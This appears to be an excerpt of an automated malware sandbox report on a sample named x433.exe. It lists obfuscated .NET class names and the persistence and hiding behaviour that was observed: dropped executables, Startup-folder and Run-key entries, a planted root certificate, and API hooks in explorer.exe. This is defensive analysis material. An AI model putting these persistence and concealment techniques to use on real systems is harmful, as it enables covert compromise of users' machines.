                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csHigh entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csHigh entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.csHigh entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.csHigh entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, vthpzjkPbD10MqQvse8d9fgJdMuC69.csHigh entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.csHigh entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.csHigh entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'
                      Source: x4usb.exe.2.dr, xfwOCj1PDUkyxHJ.csHigh entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
                      Source: x4usb.exe.2.dr, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.csHigh entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
                      Source: x4usb.exe.2.dr, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
                      Source: x4usb.exe.2.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.csHigh entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
                      Source: x4usb.exe.2.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.csHigh entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
                      Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.csHigh entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
                      Source: x4usb.exe.2.dr, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.csHigh entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
                      Source: x4usb.exe.2.dr, vthpzjkPbD10MqQvse8d9fgJdMuC69.csHigh entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
                      Source: x4usb.exe.2.dr, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.csHigh entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
                      Source: x4usb.exe.2.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.csHigh entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeFile created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeJump to dropped file
                      Source: C:\Users\user\Desktop\x433.exeFile created: C:\Users\user\AppData\Local\Temp\x4host.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeFile created: C:\Users\user\AppData\Local\x4usb.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4usb.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4usb.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_0078CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,1_2_0078CBD0
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run x4usbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run x4usbJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                      Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE x4stagerJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
